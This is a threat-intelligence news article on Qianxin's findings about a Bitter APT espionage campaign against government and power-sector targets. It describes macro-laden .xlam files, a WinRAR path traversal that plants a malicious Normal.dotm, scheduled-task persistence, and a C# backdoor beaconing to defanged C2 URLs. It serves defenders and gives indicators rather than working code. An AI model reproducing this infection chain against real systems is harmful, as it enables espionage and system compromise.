Ddos 
Image: Qianxin
China-based cybersecurity firm Qianxin Threat Intelligence Center has uncovered a new wave of attacks linked to the Bitter APT group (APT-Q-37), also known as 蔓灵花. The group—widely believed to have a South Asian background—has been conducting targeted cyber-espionage operations against government, military, and electric power entities in China, Pakistan, and other nations, deploying a newly developed C# backdoor through multi-stage infection chains exploiting Microsoft Office macros and a WinRAR path traversal vulnerability.
The researchers identified two distinct intrusion methods:
- Macro-based delivery through malicious .xlam files that compile and install a C# backdoor directly on the victim’s system.
- WinRAR exploitation that replaces Microsoft Word’s default Normal.dotm template with a malicious macro, automatically executing the backdoor during document opening.
Both chains culminate in the deployment of a C# implant capable of retrieving and executing arbitrary payloads from attacker-controlled servers.
The first infection vector originates from a weaponized Excel Add-In file named “Nominated Officials for the Conference.xlam”, which presents itself as a legitimate conference document.
“The file opens with a prompt to enable macros, and after the macros are enabled, a message box pops up, meaning ‘File parsing failed, content corrupted.’ This is just a way for the attacker to confuse the victim.”
Behind the ruse, the macro decodes Base64-encoded C# source code, saves it as C:\programdata\cayote.log, and compiles it into a dynamic library (vlcplayer.dll) using Microsoft’s csc.exe compiler — effectively transforming the victim’s own .NET framework into a malware factory.
Qianxin notes: “The periperi function in the macro code is used to implement persistence by writing the kefe.bat file in the Startup directory, which creates a scheduled task that makes a request to ‘hxxps://www.keeferbeautytrends.com/d6Z2.php?rz=’.”
This persistence mechanism and C2 infrastructure align closely with known Bitter APT operations observed in previous campaigns.
The second attack chain uses a malicious RAR archive (Provision of Information for Sectoral for AJK.rar) to exploit an unpatched WinRAR vulnerability affecting versions below 7.12.
Initially suspected to leverage CVE-2025-8088, Qianxin’s testing revealed that the attackers were exploiting an earlier, undocumented path traversal bug, enabling file overwrite during extraction.
“The malicious RAR tries to overwrite the Normal.dotm file of the current user’s original template library… after unzipping.”
When the victim opens the accompanying decoy Document.docx, Word automatically loads the infected Normal.dotm, executing its macro to connect to a remote shared folder and launch the winnsc.exe backdoor.
“The macro code in the malicious Normal.dotm connects to the remote shared folder ‘\\koliwooclients.com\templates’ via net use and then executes winnsc.exe from it.”
This technique cleverly abuses legitimate Office behavior, requiring no direct user interaction beyond opening a decoy file.
At the heart of both attack chains lies a C# backdoor, built to blend into normal system activity.
Qianxin’s analysts explain: “The main function of the backdoor is in an infinite loop, which first collects some device information… and then sends it in a POST request to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php.”
The backdoor’s functionality includes:
- Gathering system details (OS version, hostname, temporary directory paths).
- Downloading secondary payloads based on C2 instructions.
- Validating and executing EXE files after restoring their DOS headers.
- Reporting success or failure to a separate endpoint (drxcvg45.php).
All communications occur over HTTPS to attacker-controlled subdomains of esanojinjasvc.com, a domain registered in April 2025, strongly linked to Bitter’s infrastructure.
The campaign’s command-and-control patterns and script syntax confirm Qianxin’s attribution to the Bitter APT group.
“The kefe.bat script generated when the macro code of the xlam file builds persistence appears in the Bitter-related domain name www.keeferbeautytrends.com, and the script commands are in the same format as those commonly used by the Bitter.”
Furthermore, koliwooclients.com, one of the remote servers used for payload delivery, was previously exposed in the Craneflower espionage campaign — hinting at possible code or infrastructure sharing among regional APTs.
Donate